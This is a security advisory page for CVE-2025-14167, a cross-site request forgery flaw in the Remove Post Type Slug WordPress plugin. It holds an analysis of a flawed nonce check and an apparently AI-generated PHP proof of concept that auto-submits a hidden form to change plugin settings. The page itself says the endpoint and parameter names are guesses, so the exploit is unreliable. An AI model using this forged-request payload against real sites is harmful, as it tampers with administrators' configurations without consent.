Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-14167: Remove Post Type Slug <= 1.0.2 – Cross-Site Request Forgery to Settings Update (remove-post-type-slug)

CVE ID CVE-2025-14167
Plugin remove-post-type-slug
Severity Medium (CVSS 4.3)
CWE 352
Vulnerable Version 1.0.2
Patched Version
Disclosed February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14167 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the Remove Post Type Slug WordPress plugin, affecting all versions up to and including 1.0.2. The vulnerability allows unauthenticated attackers to change the plugin’s settings by tricking an administrator into clicking a malicious link.

Atomic Edge research indicates the root cause is flawed nonce validation logic. The vulnerability description explicitly states the validation incorrectly uses a logical OR (||) operator instead of an AND (&&) operator. This programming error causes the validation check to pass if either the nonce field is not empty OR the nonce verification fails. The correct logic should only pass the check when the nonce field is not empty AND the verification succeeds. This conclusion is directly stated in the CVE description, not inferred from code review.

Exploitation requires an attacker to craft a forged HTTP request that submits a POST form to the plugin’s settings update endpoint. The attacker must lure a logged-in administrator into loading a page containing the malicious form. The request would target the plugin’s admin menu callback, likely accessed via `/wp-admin/admin.php?page=remove-post-type-slug` or a similar admin-ajax.php handler. The payload would contain the new settings parameters. The attack succeeds because the flawed nonce check allows the request to proceed without a valid nonce, as long as the nonce parameter is present in the request.

Remediation requires correcting the conditional logic in the nonce validation function. The developer must replace the logical OR operator with a logical AND operator. This ensures the sensitive action only executes when a valid nonce is both present and verified. The patch should also ensure the function performing the update conducts a proper capability check, such as `current_user_can(‘manage_options’)`, though the CSRF flaw is the primary issue.

The impact of successful exploitation is limited to unauthorized modification of the plugin’s configuration settings. An attacker could disable the slug removal feature for specific post types or alter its behavior. This could disrupt site functionality or SEO. The CVSS score of 4.3 (Medium) reflects the need for user interaction (UI:R), the lack of authentication (PR:N), and the low integrity impact (I:L). The vulnerability does not lead to direct code execution, data theft, or privilege escalation.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14167 - Remove Post Type Slug <= 1.0.2 - Cross-Site Request Forgery to Settings Update
<?php
/**
 * Proof-of-concept for CSRF in Remove Post Type Slug plugin <= 1.0.2.
 * This script generates an HTML page containing a malicious form.
 * When a logged-in WordPress administrator visits this page, the form auto-submits,
 * changing the plugin's settings without consent.
 * ASSUMPTIONS:
 * 1. The plugin's settings update endpoint is at /wp-admin/admin.php?page=remove-post-type-slug (common pattern).
 * 2. The vulnerable parameter for the nonce check is named '_wpnonce'.
 * 3. The settings are updated via POST parameters named 'remove_post_type_slug_settings'.
 * 4. The action parameter for the update is 'update'.
 * These assumptions are based on standard WordPress plugin architecture as no code is available.
 */
$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin.php?page=remove-post-type-slug';
// Example malicious setting: disable slug removal for 'post' post type.
$malicious_settings = array('post' => '0');
// The attack works with any non-empty nonce value due to the OR logic bug.
$dummy_nonce = 'csrf_attack';
?>
<!DOCTYPE html>
<html>
<body>
  <h2>CSRF PoC for CVE-2025-14167</h2>
  <p>If a site administrator views this page, the plugin settings will be silently altered.</p>
  <form id="exploit" action="<?php echo htmlspecialchars($target_url); ?>" method="POST">
    <input type="hidden" name="_wpnonce" value="<?php echo $dummy_nonce; ?>" />
    <input type="hidden" name="action" value="update" />
    <?php foreach ($malicious_settings as $key => $value): ?>
      <input type="hidden" name="remove_post_type_slug_settings[<?php echo $key; ?>]" value="<?php echo $value; ?>" />
    <?php endforeach; ?>
  </form>
  <script>
    // Auto-submit the form to simulate a single click.
    document.getElementById('exploit').submit();
  </script>
</body>
</html>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School